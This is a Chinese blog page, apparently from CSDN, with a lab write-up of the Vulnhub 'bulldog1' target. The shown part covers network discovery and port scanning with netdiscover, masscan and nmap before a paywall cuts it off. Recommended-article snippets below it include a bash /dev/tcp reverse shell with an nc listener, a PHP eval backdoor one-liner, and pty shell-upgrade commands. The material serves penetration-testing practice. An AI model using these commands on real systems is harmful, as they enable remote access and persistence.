bulldog1——爆破、命令执行、pty提权

最新推荐文章于 2023-03-15 14:11:24 发布
最新推荐文章于 2023-03-15 14:11:24 发布
阅读量530 收藏
点赞数
分类专栏: 渗透测试 文章标签: 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KUKULI233/article/details/118223107
版权

1.收集信息

netdiscover,是一个二层工具,原理是数据包产生交互即判定主机存活
netdiscover -i eth0 -r 192.168.249.0/24
在这里插入图片描述

靶机:
在这里插入图片描述

端口扫描
Masscan --rate=100000 -p 0-65535 192.168.249.137 (判断出目标是137)
–rate发包数
–ports指定端口数
在这里插入图片描述

查看端口服务
Nmap -T4 -sV -O -p 8080,80,23 192.168.249.137
-sV服务版本
-T4速度(最高为5,推荐用4)
-O系统
-p 指定端口
在这里插入图片描述

2.开展渗透

尝试爆破ssh<

最低0.47元/天 解锁文章
王兰花开富贵险中求
关注
专栏目录
vuInhub靶场实战系列-bulldog-1
06-03
vuInhub靶场实战系列-bulldog-1
DC 靶机
niqiu320的博客
05-12 4211
DC-1实战 大致流程(copy博客为lainwith的) 环境kali 1、首先ifconfig 得知ip为192.168.149.xxx/ 2、局域网探测arp-scan -l 得知靶机ip为192.168.149.147 3、扫描端口nmap -sV -p- 192.168.149.147,查看端口信息,得知80端口开放,浏览器访问80端口查看 4、目录遍历dirb http://192.168.149.147,无可用信息 5.、启动Metersploit来查看漏洞并利用漏洞msfconsole 6
python:pty --- 伪终端工具
最新发布
点点关注不迷路
03-15 1028
python:pty --- 伪终端工具
python打开伪终端,使用python pty伪终端进程发送命令并退出
weixin_42120283的博客
11-30 782
Using python pty module, i want to send some commands to the terminal emulator, using a function as stdin (as pty module wants), and then force quitting. I thought about something likeimport ptycmnds ...
sudo命令中python提权
qq_40898302的博客
05-10 4424
python的提权
实现交互式shell的几种方式:python pty 方式、升级nc、socat、script获取pty
热门推荐
闵行小鱼塘
06-04 1万+
当我们拿到一个webshell的时候,我们能够执行一些命令,但是这些命令都是非交互的,也就是说不存在上下文的概念。当我们想使用vim、top等命令时,webshell就无能为力了。 那我们怎么获取一个可交互的webshell呢?
BULLDOG-开源
05-27
【标题】"BULLDOG-开源"所涉及的知识点主要围绕着开源工作流解决方案Bulldog以及与其关联的J2EE容器和Tomcat展开。 首先,Bulldog作为一个开源项目,意味着它的源代码对公众开放,允许用户查看、使用、修改并分发...
bulldog_shop
05-09
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) ...
British Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的British Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
French Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的French Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)
qq_45722813的博客
11-15 2693
Vulnhub靶场渗透测试系列-bulldog 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware,设置网络模式为NAT模式,开启靶机虚拟机 在kali攻击机使用命令nmap -Pn 192.168.172.1/24来获取靶机的IP地址 这里如果实在扫不出来靶机IP地址的话参考这篇文章来进行设置 https://blog.csdn.net/qq_45722813/article/details/121324686 得到靶机IP地
反弹shell的多种方式
xxx9686的博客
09-16 675
升级成半交互式 tty升级成完全交互式 tty,能用方向键 + tab,就是退出比较麻烦。
python3 -c ‘import ptypty.spawn(“/bin/bash“)‘升级切换交互式shell
sweelg的博客
02-28 3931
python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm Ctrl+Z stty -a stty raw -echo;fg reset stty rows 29 columns 94 row和columns数据为stty -a后的数据
python pty模块 - 作用1 - 虚拟一个串口
V__KING__的专栏
11-18 3239
pty模块是一个虚拟终端库。也可以虚拟出一个串口。 在嵌入式开发过程中,你一定有这样一种需求:想在虚拟机上调试串口的通信。 那么这个pty库是可以满足你的需求的。 #coding=utf-8 import pty import os import select def mkpty(): #Open a new tty master1, slave = pty.openpty() slaveName1 = os.ttyname(slave) master2, slave =
脏牛提权及交互shell
weixin_43047908的博客
07-03 2700
目录什么是脏牛漏洞?影响范围及危害漏洞复现环境搭建脏牛提权完全交互shell权限维持 什么是脏牛漏洞? 脏牛漏洞(CVE-2016–5195),又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞,在2016年10月18后才得以修复,因此影响范围很大。 漏洞具体是由于get_user_page内核函数在处理Copy-on-Write的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。修改su或者
使用node-pty报错Uncaught Error: This socket has been ended by the other party
oNew_Lifeo的博客
08-15 1636
显然这个问题是由Node默认在 RW 模式下打开管道套接字引起的。百度了2天都没找出问题所在,最后还是在github上找到了答案。解决:将node 14 换成 node 13.14.0。主要出现错误的地方在ptyProcess.write。显然不能使用ConPTY进行终端进程通信了。...
反弹Shell升级为交互式Shel
weixin_46622976的博客
04-27 1564
前言 经常我们拿到的shell是一个简单的shell 如何把一个简单的shell就升级到一个标准交互式shell 写这篇文章记录一下 正文 攻击机:kali 靶机:ubuntu 普通Shell 给kali弹shell bash -i >& /dev/tcp/192.168.145.128/4444 0>&1 kali:nc -lvvp 4444 然后发现这个shell有很多问题 无法使用vim等文本编辑器 不能补全 不能su 没有向上箭头使用历史 等等 .
黑客常用 Linux 入侵常用命令
杨春建的博客
02-10 1万+
原文地址:http://blog.csdn.net/jHstGeWWubw/article/details/78941387写个php一句话后门上去:[jobcruit@wa64-054 rankup_log]$ echo -e "&lt;?php @eval(\$_POST[md5])?&gt;" &gt;rankuplog_time.php[jobcruit@wa64-054 rankup_l...
实战Linux下三种不同方式的提权技巧
fly小灰灰的专栏
03-17 1万+
介绍在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。实验一:利用Linux内核漏洞提权VulnOS version 2是VulHub上的一个Linux提权练习,当打开虚拟机后,可以看到 获取到低权限SHELL后我们通常做下面几件事1.检测操作系
Python操作MySQL数据库:cursor游标详解与渗透测试思路
- Vulnhub提供了多个渗透测试环境,如Breach1.0, Billu_b0x, Bulldog1等,用于实践和提升渗透测试技能。 - 靶场涵盖了多种漏洞类型,包括文件包含、SQL注入、文件上传等,模拟真实环境下的安全挑战。 通过上述...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值